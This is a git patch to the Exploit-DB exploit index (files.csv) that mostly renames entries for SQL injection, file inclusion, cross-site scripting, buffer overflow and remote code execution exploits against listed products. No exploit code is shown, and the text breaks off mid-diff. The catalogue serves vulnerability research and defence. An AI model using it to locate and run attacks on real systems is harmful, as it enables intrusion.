From 77681134f4d39913f6181eb779a321351deea1b4 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 5 Oct 2016 05:01:18 +0000 Subject: [PATCH] DB: 2016-10-05 3 new exploits CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion E-SMARTCART 1.0 - (Product_ID) SQL Injection E-Smart Cart 1.0 - 'Product_ID' SQL Injection E-SMART CART - 'productsofcat.asp' SQL Injection E-Smart Cart - 'productsofcat.asp' SQL Injection CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection E-Smartcart - SQL Injection E-Smart Cart - SQL Injection CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection CubeCart PHP 4.3.x - 'shipkey' SQL Injection CS Cart 1.3.3 - (install.php) Cross-Site Scripting CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting dansie shopping cart 3.0.4 - Multiple Vulnerabilities Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities Sendmail 8.11.6 - Address Prescan Memory Corruption Joomla! Component RSfiles (cid parameter) - SQL Injection Joomla! Component RSfiles - (cid parameter) SQL Injection Dovecot with Exim sender_address Parameter - Remote Command Execution Dovecot with Exim - sender_address Parameter Remote Command Execution Exim sender_address Parameter - Remote Code Execution Exim - sender_address Parameter Remote Code Execution PHP 4.x/5.0/5.1 with Sendmail Mail Function additional_parameters - Argument Arbitrary File Creation PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation Simplog 0.9.3 BlogID Parameter - Multiple SQL Injections Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections E-SMART CART - 'Members Login' Multiple SQL Injection Vulnerabilities E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities MW6 Technologies Aztec ActiveX (Data parameter) - Buffer Overflow MW6 Technologies Datamatrix - ActiveX (Data Parameter) - Buffer Overflow MW6 Technologies MaxiCode ActiveX (Data parameter) - Buffer Overflow MW6 Technologies Aztec ActiveX - (Data parameter) 
Buffer Overflow MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow WordPress Plugin Recipes Blog 'id' Parameter - SQL Injection WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection Le Forum 'Fichier_Acceuil' Parameter - Remote File Inclusion Le Forum - 'Fichier_Acceuil' Parameter Remote File Inclusion eFront 3.6.14.4 (surname parameter) - Persistent Cross-Site Scripting eFront 3.6.14.4 - (surname parameter) Persistent Cross-Site Scripting WordPress Plugin Safe Search 'v1' Parameter - Cross-Site Scripting WordPress Plugin Safe Search - 'v1' Parameter Cross-Site Scripting WordPress Plugin Twitter Feed 'url' Parameter - Cross-Site Scripting WordPress Plugin Twitter Feed - 'url' Parameter Cross-Site Scripting WordPress Plugin GD Star Rating 'votes' Parameter - SQL Injection WordPress Plugin GD Star Rating - 'votes' Parameter SQL Injection AJ Classifieds 'listingid' Parameter - SQL Injection AJ Classifieds - 'listingid' Parameter SQL Injection PHP Prior to 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities Opera Web Browser Prior to 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities Opera Web Browser < 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities Bind 9 DNS Server - Denial of Service Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC) Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC) Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC) Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC) OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution Disk Pulse Enterprise 9.0.34 - Buffer Overflow --- files.csv | 62 +++---- platforms/multiple/dos/40453.py 
| 201 +++++++++++++++++++++++ platforms/unix/{remote => local}/22442.c | 0 platforms/windows/remote/40452.py | 93 +++++++++++ 4 files changed, 326 insertions(+), 30 deletions(-) create mode 100755 platforms/multiple/dos/40453.py rename platforms/unix/{remote => local}/22442.c (100%) create mode 100755 platforms/windows/remote/40452.py
diff --git a/files.csv b/files.csv
index c7119fb68..70cf5f95d 100755
--- a/files.csv
+++ b/files.csv
@@ -1583,7 +1583,7 @@ id,file,description,date,author,platform,type,port
 1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote File Inclusion",2006-06-03,rgod,php,webapps,0
 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
-1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
+1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - 'catid' SQL Injection",2006-06-03,FarhadKey,asp,webapps,0
 1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection",2006-06-03,rgod,php,webapps,0
 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - 'profile.php' Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0
@@ -2750,7 +2750,7 @@ id,file,description,date,author,platform,type,port
 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0
 3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0
 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0
-3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 - (Product_ID) SQL Injection",2007-01-03,ajann,asp,webapps,0
+3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0
 3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0
 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0
 3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0
@@ -5432,7 +5432,7 @@ id,file,description,date,author,platform,type,port
 5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0
 5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0
 5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0
-5805,platforms/asp/webapps/5805.txt,"E-SMART CART - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0
+5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0
 5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0
 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0
 5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0
@@ -7705,7 +7705,7 @@ id,file,description,date,author,platform,type,port
 8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (sql into outfile) eval() Injection",2009-03-09,StAkeR,php,webapps,0
 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,php,webapps,0
 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0
-8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection",2009-03-09,netsoul,php,webapps,0
+8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps,0
 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0
 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0
@@ -9792,7 +9792,7 @@ id,file,description,date,author,platform,type,port
 10534,platforms/php/webapps/10534.txt,"Rumba XM - Cross-Site Scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0
 10535,platforms/php/webapps/10535.txt,"WordPress Plugin Pyrmont 2.x - SQL Injection",2009-12-18,Gamoscu,php,webapps,0
 10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
-10540,platforms/asp/webapps/10540.txt,"E-Smartcart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0
+10540,platforms/asp/webapps/10540.txt,"E-Smart Cart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0
 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69
 10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS - SQL Injection",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 10544,platforms/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0
@@ -12430,7 +12430,7 @@ id,file,description,date,author,platform,type,port
 14111,platforms/php/webapps/14111.txt,"Allomani - Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0
 14112,platforms/php/webapps/14112.txt,"PageDirector CMS - 'result.php' SQL Injection",2010-06-29,v3n0m,php,webapps,0
 14115,platforms/windows/webapps/14115.txt,"Gekko CMS - SQL Injection",2010-06-29,[]0iZy5,windows,webapps,80
-14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection",2010-06-29,"Core Security",multiple,webapps,80
+14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP 4.3.x - 'shipkey' SQL Injection",2010-06-29,"Core Security",multiple,webapps,80
 30100,platforms/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0
 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80
 14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0
@@ -13062,7 +13062,7 @@ id,file,description,date,author,platform,type,port
 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH Exploit",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0
 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0
 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - SEH Overflow",2010-09-09,"Abhishek Lyall",win_x86,local,0
-14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 - (install.php) Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80
+14962,platforms/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80
 14964,platforms/php/webapps/14964.txt,"Joomla! Component com_jphone - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
 14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps,0
 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
@@ -17221,7 +17221,7 @@ id,file,description,date,author,platform,type,port
 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 - COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0
 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0
 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A - crypt() Exploit",2000-04-15,Sean,qnx,local,0
-19852,platforms/cgi/remote/19852.txt,"dansie shopping cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0
+19852,platforms/cgi/remote/19852.txt,"Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0
 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0
 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0
 19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0
@@ -19725,7 +19725,7 @@ id,file,description,date,author,platform,type,port
 22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module - Full Path Disclosure",2003-03-28,rkc,php,webapps,0
 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ - IP Fragment Reassembly Denial of Service",1998-04-16,humble,hardware,dos,0
 22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x / Opera 7.0 - LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",multiple,dos,0
-22442,platforms/unix/remote/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,remote,0
+22442,platforms/unix/local/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,local,0
 22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0
 22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0
 22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0
@@ -22051,7 +22051,7 @@ id,file,description,date,author,platform,type,port
 24848,platforms/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0
 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0
 24850,platforms/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0
-24851,platforms/php/webapps/24851.txt,"Joomla! Component RSfiles (cid parameter) - SQL Injection",2013-03-18,ByEge,php,webapps,0
+24851,platforms/php/webapps/24851.txt,"Joomla! Component RSfiles - (cid parameter) SQL Injection",2013-03-18,ByEge,php,webapps,0
 24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0
 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0
 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0
@@ -22481,7 +22481,7 @@ id,file,description,date,author,platform,type,port
 25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80
 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0
 25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local,0
-25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0
+25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - sender_address Parameter Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0
 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80
 25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - Query Parameter URI redirection",2005-03-28,CorryL,php,webapps,0
 25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0
@@ -23164,7 +23164,7 @@ id,file,description,date,author,platform,type,port
 25967,platforms/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",hardware,dos,0
 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0
-25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - Remote Code Execution",2013-06-05,eKKiM,linux,remote,0
+25970,platforms/linux/remote/25970.py,"Exim - sender_address Parameter Remote Code Execution",2013-06-05,eKKiM,linux,remote,0
 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0
 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0
@@ -24513,7 +24513,7 @@ id,file,description,date,author,platform,type,port
 27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0
 27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 - mailto.php userid Parameter Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0
 27333,platforms/php/webapps/27333.txt,"QwikiWiki 1.4 - 'index.php' Cross-Site Scripting",2006-02-28,Dr^Death,php,webapps,0
-27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function additional_parameters - Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
+27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0
 27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 - Inc_header.php Cross-Site Scripting",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0
 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0
@@ -26005,7 +26005,7 @@ id,file,description,date,author,platform,type,port
 28903,platforms/php/webapps/28903.txt,"ac4p Mobile - send.php cats Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
 28904,platforms/php/webapps/28904.txt,"ac4p Mobile - up.php Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
 28905,platforms/php/webapps/28905.txt,"ac4p Mobile - cp/index.php pagenav Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
-28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 BlogID Parameter - Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0
+28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0
 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0
 28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0
 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0
@@ -28015,7 +28015,7 @@ id,file,description,date,author,platform,type,port
 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 31057,platforms/osx/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,osx,dos,0
 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
-31059,platforms/asp/webapps/31059.txt,"E-SMART CART - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
+31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
 31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
@@ -28133,9 +28133,9 @@ id,file,description,date,author,platform,type,port
 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
 31174,platforms/php/webapps/31174.txt,"Joomla! Extension Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80
 31175,platforms/php/webapps/31175.txt,"Joomla! Extension JV Comment 3.0.2 - (index.php id Parameter) SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
-31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
-31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
-31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
+31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
+31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
+31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
 31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001
 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555
@@ -28196,7 +28196,7 @@ id,file,description,date,author,platform,type,port
 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0
 31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
-31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog 'id' Parameter - SQL Injection",2008-02-18,S@BUN,php,webapps,0
+31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0
 31230,platforms/php/webapps/31230.txt,"WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0
@@ -28229,7 +28229,7 @@ id,file,description,date,author,platform,type,port
 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0
 31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0
 31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service",2008-03-04,sipherr,bsd,dos,0
-31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31528,platforms/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0
 31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0
 31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",windows,remote,53
@@ -30444,7 +30444,7 @@ id,file,description,date,author,platform,type,port
 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
 33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 / 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps,0
-33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname parameter) - Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80
+33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 - (surname parameter) Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80
 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
 33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id Parameter) SQL Injection",2014-06-10,LiquidWorm,php,webapps,80
@@ -31678,7 +31678,7 @@ id,file,description,date,author,platform,type,port
 35064,platforms/php/webapps/35064.txt,"Zimplit CMS - English_manual_version_2.php client Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0
 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
